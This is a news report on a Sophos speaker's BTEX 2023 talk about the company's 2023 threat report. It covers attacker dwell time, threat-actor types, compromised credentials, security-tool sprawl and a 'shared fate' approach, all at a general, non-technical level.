BTEX 2023: Sophos Shares Key Findings from Their 2023 Threat Report

According to Sophos' data, and against what most people would probably assume, dwell time (the time between when a threat actor first gets into an environment until they either are detected or have announced themselves) has been decreasing, said Lam. "We've seen the average dwell time for all types of attacks shrink from 15 days down to 10 days, which tells us that these attackers are getting faster. They are putting their foot on the gas pedal and trying to do as much damage as quickly as they can."

Sophos' research shows how malware's prevalence is going down as more discreet techniques rise, said Lam. "We are not seeing malware as prevalent in the attacks. Instead, they're favouring other stealthier techniques that aren't as loud or trip as many alarms. The actual use of malicious files has slowly gone down in favour of command line and memory injection techniques."

Sophos' research shows that the number of security tools organizations use has increased, but that's not necessarily a positive thing. "The average number of (security) tools in an organization has also gone up, and that's a direct response to the complication and the sophistication behind these attacks," says Lam. This can be a bit of an issue. You are putting in more and more tools. There's more and more compliance. There are more and more audit requirements, and it can be very stressful (for security professionals)."

Lam classified threat actors into three main groups: hobbyist attackers, professional black-hat hackers and state-funded groups. In Lam's words: "Hobbyists are taking stuff they found online, and maybe they're doing this for fun or as a prank; they are mostly unskilled novices. Black-hat hackers have the skills, they focus on cyberattacks and they're able to do damage. They might even do this as a primary source of income. Depending on the industry you work in, you might also consider nation or state-funded groups as well. Especially given some of the geopolitical and economic environments, they can also be a concern for businesses."

However, Lam warned the audience that, in practice, all three groups are interconnected. "It's worth highlighting that these groups are not mutually exclusive. You don't just think of hobbyists. You don't just think of the cybercrime groups and think of government-funded groups. One trend we're seeing is that these start to bleed over in a couple of different ways. Now more than ever, it's easier for someone to go into the deep web and purchase the tools that they need, whether that's access to compromised companies, ransomware tools or malicious toolkits. They can purchase what they need, put them together and launch a full-scale attack."

Even state-funded groups with political motives are sometimes attacking organizations to get extra funds, warned Lam. "If they (state-funded groups) are not already doing this during the day, they may very likely go home at night and start to attack businesses in other countries as almost a form of side hustle. It's another revenue stream for them."

Sophos' research also indicates that the number of compromised credentials made a big jump in 2022, despite the fact that the number of phishing attempts decreased, said Lam. "Globally, phishing activity actually went down. There are less phishing messages that are being sent and phishing campaigns that are out there. However, the stats around compromised credentials tells us that these phishing attempts are more successful. So, they're getting better at tricking these users into giving up their accounts." 

Due to the increasing number of threats in the market, there's a trend among organizations to get more security tools, which are often hard to handle and configure efficiently, explained Lam. "A misconception that I see all the time is 'I need new tools. I need new solutions. I need new products, so let's go and purchase stuff,' and that can mean more and more tools being introduced to the IT team. More projects; more burden on them."

If things get out of control, alerts could end up being ignored, said Lam. "There could be hundreds of alerts, hundreds of hours a week in order to sort through and understand what's going on. And so, it's no wonder we see that less than half of those alerts go investigated, most of them are ignored and no one really knows what they were trying to convey. That gap can be so dangerous."

Lam also argued that the shared responsibility model could fall short when it comes to keeping certain companies safe. "I'm sure you guys have heard of the model of shared responsibility where the vendor is responsible for their infrastructure, the firmware, the hardware and the availability. It's up to the end user to secure whatever they put on there. And it made sense at the time (when the model was created), they can only do so much, but it kind of left an inherent division. In terms of responsibilities, the vendor will do what they can do; the customer does what they can do, and that's kind of the end of the story.

"We see today that, ultimately, that doesn't work. Not every organization has access to proper cybersecurity or cloud security specialists, they don't necessarily know that they're configured properly in the cloud, and so there are tons of times where you see, even in public cloud infrastructure, those companies are getting compromised."

Lam suggested that a shared-fate approach is the natural next step towards ensuring companies are protected. "Shared fate is kind of the next evolution of responsibility where we don't just want to sell you the tools and walk away. We want to surround those tools with enablement to make sure that you are properly leveraging them, and that's the way that we (at Sophos) want to approach our tools and our security as we go forward."